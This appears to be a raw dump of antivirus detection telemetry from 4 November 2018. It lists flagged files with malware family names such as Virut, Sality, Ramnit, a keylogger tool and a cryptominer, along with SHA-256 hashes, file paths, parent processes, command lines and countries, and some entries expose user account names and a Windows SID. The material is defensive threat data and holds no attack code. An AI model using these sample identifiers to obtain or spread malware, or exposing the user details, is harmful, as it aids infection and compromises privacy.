  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T19:29:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T17:08:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:48:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T18:15:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:42:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T20:32:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T10:02:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='simms.vir', filepath='C:\\Program Files (x86)\\Bolshevism\\simms.VIR', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='2308f6cbca6e4919b6b50d3e3952464aee5e99967a2e8e3f2d44ef88286b34ec', metadata=Row(cmdline='-k WerSvcGroup', country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-04T03:18:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='simms.exe', filepath='C:\\Program Files (x86)\\Bolshevism\\simms.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='2308f6cbca6e4919b6b50d3e3952464aee5e99967a2e8e3f2d44ef88286b34ec', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Bolshevism\\simms.exe', parentsize=384000, timestamp='2018-11-04T03:09:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='openvpn.exe', filepath='C:\\Program Files (x86)\\VPN Unlimited\\openvpn.exe', filesize=768000, name='W32/Neshta.A.#M1.#R1'), hash='239f2c85506cf6e390ba59748b42df87f954d10ce36651c6a852bdd0614dbe71', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:OTbXg\\\\\\/gmnEWe7BXK.1', country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T06:10:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fst_de_182.exe.vir', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\C\\Program Files (x86)\\fst_de_182\\fst_de_182.exe.vir', filesize=3968000, name='Adware/Eorezo.ldor.#M1.#R1'), hash='23b2e89ec91237026a2bee1281972855bdb3ef408985be5307b554e518f88e6a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:18:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='blackstorm.dlr', filepath='C:\\Program Files\\Autodesk\\3ds Max 2014\\stdplugs\\BlackStorm.dlr', filesize=576000, name='TR/Crypt.XPACK.Gen.#M300.#R7269'), hash='24296f07b2db13327c95a6547a6c0d82387a8476158e8bf57a3931f68293d379', metadata=Row(cmdline=None, country='AE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Autodesk\\3ds Max 2014\\3dsmax.exe', parentsize=11053896, timestamp='2018-11-04T18:50:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='blackstorm.dlr', filepath='\\\\?\\C:\\Program Files\\Autodesk\\3ds Max 2014\\stdplugs\\BlackStorm.dlr', filesize=576000, name='TR/Crypt.XPACK.Gen.#M300.#R7269'), hash='24296f07b2db13327c95a6547a6c0d82387a8476158e8bf57a3931f68293d379', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:45:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='blackstorm.dlr', filepath='C:\\Program Files\\Autodesk\\3ds Max 2014\\stdplugs\\BlackStorm.dlr', filesize=576000, name='TR/Crypt.XPACK.Gen.#M300.#R7269'), hash='24296f07b2db13327c95a6547a6c0d82387a8476158e8bf57a3931f68293d379', metadata=Row(cmdline=None, country='AE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Autodesk\\3ds Max 2014\\3dsmax.exe', parentsize=11053896, timestamp='2018-11-04T16:20:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-003053-305bbf07', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3660ac18\\AVSCAN-20181105-003005-292C46FD\\AVSCAN-20181105-003053-305BBF07', filesize=576000, name='TR/Black.Gen2.#M1.#R1'), hash='24296f07b2db13327c95a6547a6c0d82387a8476158e8bf57a3931f68293d379', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T22:31:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.82.#M1.#R1'), hash='242dcedd1ac674fc3b63637faf71ca6efd0c7aea7a382837ed25eec44cb11587', metadata=Row(cmdline=None, country='PS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T22:57:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0003391.exe', filepath='f:\\system volume information\\_restore{c479216e-5d38-4428-b4db-e28930c85d49}\\rp8\\A0003391.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='2442b34d614f97411b56d9aa07c83b2a4c54ddc0edcf258bced6cbd0e295c268', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:28:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hoftdtrn.exe', filepath='\\?\\N:\\مصارعة\\العااااااااااب\\بيت الرعب\\HOFTDTRN.EXE', filesize=384000, name='W32/Sality.AT.#M1.#R1'), hash='244674a8102c5dbe45ff81b96658cf90e1534a7c38d57ca68d138f17f388b392', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:40:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rnsy919.exe', filepath='C:\\Users\\X\\AppData\\Local\\4A078520-1432572570-11E2-990F-089E01585879\\rnsy919.exe', filesize=128000, name='HEUR/AGEN.1029157.#M1.#R1'), hash='248d163a709d044da15cc6be8d75faf3ffef38d473765f0b4b08e6afbe553503', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:y2GXSJEeTUuIPWwi.1', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T10:02:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rnsy919.exe', filepath='C:\\Users\\X\\AppData\\Local\\4A078520-1432572570-11E2-990F-089E01585879\\rnsy919.exe', filesize=128000, name='HEUR/AGEN.1029157.#M1.#R1'), hash='248d163a709d044da15cc6be8d75faf3ffef38d473765f0b4b08e6afbe553503', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:y2GXSJEeTUuIPWwi.1', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T10:02:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rnsy919.exe', filepath='C:\\Users\\X\\AppData\\Local\\4A078520-1432572570-11E2-990F-089E01585879\\rnsy919.exe', filesize=128000, name='HEUR/AGEN.1029157.#M1.#R1'), hash='248d163a709d044da15cc6be8d75faf3ffef38d473765f0b4b08e6afbe553503', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:y2GXSJEeTUuIPWwi.1', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T10:02:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rnshf0ea.exe', filepath='C:\\Users\\X\\AppData\\Local\\49E93CE4-1432579934-11DF-8465-E7B290356F52\\rnshF0EA.exe', filesize=128000, name='HEUR/AGEN.1029157.#M1.#R1'), hash='248d163a709d044da15cc6be8d75faf3ffef38d473765f0b4b08e6afbe553503', metadata=Row(cmdline='-k secsvcs', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T20:11:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='thunderbird setup 52.1.1 english.exe', filepath='G:\\BACKUP-DATA-SINTA\\DATA TGL 4 NOVEMBER 2018\\Thunderbird Setup 52.1.1 English.exe', filesize=100000, name='W32/Sality.#M1.#R1'), hash='24a34583d74e7de4262d8b6e8c50f4526de43b5042386c4bf87ff98e19a28e0e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:26:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f_0011d9', filepath='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_0011d9', filesize=280000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='250aefbe78bbe28af33fae3dbd7d72e97674c34c30613a8566a819b7ba7cd460', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-04T20:42:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xcopy.exe', filepath='\\\\?\\C:\\Windows\\System32\\xcopy.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='25f7fe18237e075519e239bd966cf8f09da1c9603534824c2e7ab869337b541b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:00:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\system32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='26c6990e060ac6408d69e1cab2b5d912b4e5289b92478028744a7c8e3d927bc5', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:50:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='c:\\windows\\system32\\searchprotocolhost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='26c6990e060ac6408d69e1cab2b5d912b4e5289b92478028744a7c8e3d927bc5', metadata=Row(cmdline='Global\\\\UsGthrFltPipeMssGthrPipe17_ Global\\\\UsGthrCtrlFltPipeMssGthrPipe17 1 -2147483646 \\"Software\\\\Microsoft\\\\Windows Search\\" \\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\" \\"C:\\\\ProgramData\\\\Microsoft\\\\Search\\\\Data\\\\Temp\\\\usgthrsvc\\" \\"DownLevelDaemon\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-04T10:45:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='26c6990e060ac6408d69e1cab2b5d912b4e5289b92478028744a7c8e3d927bc5', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:45:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='nerodeltmp.exe', filepath='G:\\D_DISK\\soft\\gnral soft\\Nero\\Installation\\Setup\\NeroDelTmp.exe', filesize=1120000, name='TR/Patched.Ren.Gen.#M2.#R3369'), hash='26d83439edc27d47813b29ed9a2649e5e6e22e66daa19118e1e577917ef9ac3b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T09:49:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-141731-35da6095', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e09dc19c\\AVSCAN-20181104-133548-4D3A2C82\\AVSCAN-20181104-141731-35DA6095', filesize=128000, name='ADWARE/AgentCV.A.10412.#M1.#R1'), hash='26e1d911bfcd1044d2c49eb854e8688241350e76f3e23b66022c32d8b09b5f9d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:17:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tcupdater.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\TCSystem\\TCUpdater.exe', filesize=1088000, name='HEUR/APC.#M1.#R1'), hash='2778037bc22ff4333facb7e8bedea1523bd7a63a6a7476142b497339a65d269e', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:12:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tcupdater.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\TCSystem\\TCUpdater.exe', filesize=1088000, name='HEUR/APC.#M1.#R1'), hash='2778037bc22ff4333facb7e8bedea1523bd7a63a6a7476142b497339a65d269e', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:12:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='winrar.exe', filepath='C:\\Program Files\\WinRAR\\WinRAR.exe', filesize=1068000, name='W32/Ramnit.C.#M1.#R1'), hash='281c030c6f339be9d06a0122ea294b463cebdd6f361a20fa50821150bba55478', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=770648, timestamp='2018-11-04T17:14:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='winrar.exe', filepath='\\\\?\\C:\\Program Files\\WinRAR\\WinRAR.exe', filesize=1068000, name='W32/Ramnit.C.#M1.#R1'), hash='281c030c6f339be9d06a0122ea294b463cebdd6f361a20fa50821150bba55478', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:21:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='winrar.exe', filepath='\\\\?\\C:\\Program Files\\WinRAR\\WinRAR.exe', filesize=1068000, name='W32/Ramnit.C.#M1.#R1'), hash='281c030c6f339be9d06a0122ea294b463cebdd6f361a20fa50821150bba55478', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:41:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dictedit.exe', filepath='C:\\Program Files (x86)\\PRMT8\\ALPHA\\DictEdit.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='2863d1b95f79d498b45b191403869b205a506c5c1caea03db78e1b18d394f853', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:07:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\USERS\\X\\APPDATA\\ROAMING\\MICROSOFT\\WINDOWS\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='2895db15805c1a6c78b4ed6ad09c43ef2eb68a63c217e98850b1e7d73cb3fa80', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T22:29:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='calc.exe', filepath='C:\\System32\\calc.exe', filesize=960000, name='W32/Neshta.A.#M1.#R1'), hash='28f2c9570a38409e357630a9188b2331dee3e1dfa725f6893637313aa3bda352', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe6_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe6 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T08:12:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='chromium donir', filepath='C:\\Windows\\System32\\Tasks\\Chromium donir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='295cc060e51ac4fe40afe534703f6f4640539b8fd4972281b05c9bb101e33ec5', metadata=Row(cmdline='{3845D116-CC60-410C-8A44-D5131F1AFC4A} S-1-5-21-2139321052-1182382558-2006416534-1001:Kalij\\\\\\\\Kuser:Interactive:LUA[1]', country='LY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=359936, timestamp='2018-11-04T15:37:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-173746-2f826d74', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b2e46536\\AVSCAN-20181104-173714-2B105675\\AVSCAN-20181104-173746-2F826D74', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='295cc060e51ac4fe40afe534703f6f4640539b8fd4972281b05c9bb101e33ec5', metadata=Row(cmdline=None, country='LY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:37:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='crashreport.exe', filepath='E:\\ulaed\\SWDownload\\Program files\\Spark Browser\\crashreport.exe', filesize=704000, name='W32/Chir.B.#M1.#R1'), hash='2a81b03ce780e415ae0282fd3eacc41e530a0ea8a79189491fe0ba288424cc89', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T09:06:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pegawai.exe', filepath='F:\\Database\\Prog_LPD\\Prog_LPD\\Exeprog-mdk\\Pegawai.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='2aaf973a1db9053aef93ccc6e4786f612ccebafb0d1401c893f08a160db5afbf', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=23784, timestamp='2018-11-04T08:28:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204857-6c7f4acb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b8579126\\AVSCAN-20181104-204846-6A60DB9F\\AVSCAN-20181104-204857-6C7F4ACB', filesize=1216000, name='HEUR/APC.#M1.#R1'), hash='2b17d6f6b7e21cc644ab6f3134f5ecc9aaf3fc29bc9f2d87e61735a5560e1034', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:49:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mvp16_tool.exe', filepath='C:\\Program Files\\MVP Baseball 16\\MVP16_Tool.exe', filesize=1216000, name='HEUR/AGEN.1034262.#M1.#R1'), hash='2b17d6f6b7e21cc644ab6f3134f5ecc9aaf3fc29bc9f2d87e61735a5560e1034', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:hacvsyUZBkqKmD4K.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T12:48:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='noceduti.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2543273\\noceduti.exe', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T21:55:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='noceduti.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2543273\\noceduti.exe', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\MP3Rocket_Setup (1).exe', parentsize=1611720, timestamp='2018-11-04T20:15:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='noceduti.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2543273\\noceduti.exe', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:15:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='noceduti.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1727216\\noceduti.exe', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\PC Programme 04.11.2018\\FFSetup.exe', parentsize=67121584, timestamp='2018-11-04T19:24:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151546-d46af5a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5dd10c7b\\AVSCAN-20181104-150719-909FFCA3\\AVSCAN-20181104-151546-D46AF5A9', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:15:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='noceduti.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp3889892\\noceduti.exe', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\installer_ares.exe', parentsize=2383184, timestamp='2018-11-04T19:22:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151722-e1329a6d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5dd10c7b\\AVSCAN-20181104-150719-909FFCA3\\AVSCAN-20181104-151722-E1329A6D', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:17:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='noceduti.vir', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp6832729\\noceduti.VIR', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T20:17:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202516-17fd568d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0ab1a527\\AVSCAN-20181104-202508-1673569C\\AVSCAN-20181104-202516-17FD568D', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:25:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151100-74631bf2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_68883beb\\AVSCAN-20181104-150843-60812614\\AVSCAN-20181104-151100-74631BF2', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T20:10:54Z'), dt=datetime.date(2018, 11, 4)),
